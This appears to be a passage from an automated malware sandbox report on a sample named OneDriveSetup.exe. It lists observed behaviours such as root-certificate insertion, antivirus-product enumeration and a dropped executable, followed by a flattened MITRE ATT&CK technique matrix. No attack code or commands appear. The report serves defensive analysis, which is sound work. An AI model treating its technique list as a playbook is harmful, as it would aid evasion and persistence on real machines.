                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                Stealing of Sensitive Information

                Source: C:\Windows\System32\svchost.exeRegistry value created:
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066240A glHint,glClearColor,glPixelStorei,glGenTextures,glBindTexture,glTexParameteri,glTexParameteri,glTexParameteri,glTexEnvf,9_2_0066240A
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666AC8 glPixelStorei,glHint,glClearColor,glPixelStorei,glGenTextures,glBindTexture,glTexParameteri,glTexParameteri,glTexParameteri,glTexEnvf,glPixelStorei,glEnable,glEnable,glBindTexture,glPixelStorei,glPixelStorei,glPixelStorei,glTexImage2D,glPixelStorei,glPixelStorei,glTexSubImage2D,glPixelStorei,glPixelStorei,glPixelStorei,glTexSubImage2D,glDisable,glDisable,glDisable,9_2_00666AC8
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information11
                Scripting
                Valid Accounts341
                Windows Management Instrumentation
                11
                Scripting
                1
                LSASS Driver
                411
                Disable or Modify Tools
                31
                Input Capture
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Native API
                1
                LSASS Driver
                1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 31 Input Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 167 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | 3 PowerShell | 3 Windows Service | 3 Windows Service | 11 Software Packing | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | 111 Registry Run Keys / Startup Folder | 112 Process Injection | 1 Timestomp | LSA Secrets | 4101 Security Software Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 111 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | 281 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 32 Masquerading | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 2 Modify Registry | /etc/passwd and /etc/shadow | 21 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 281 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Access Token Manipulation | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 112 Process Injection | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior graph (image not reproduced). Behavior Graph ID: 1664120, Sample: OneDriveSetup.exe, Start date: 13/04/2025, Architecture: WINDOWS, Score: 82

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.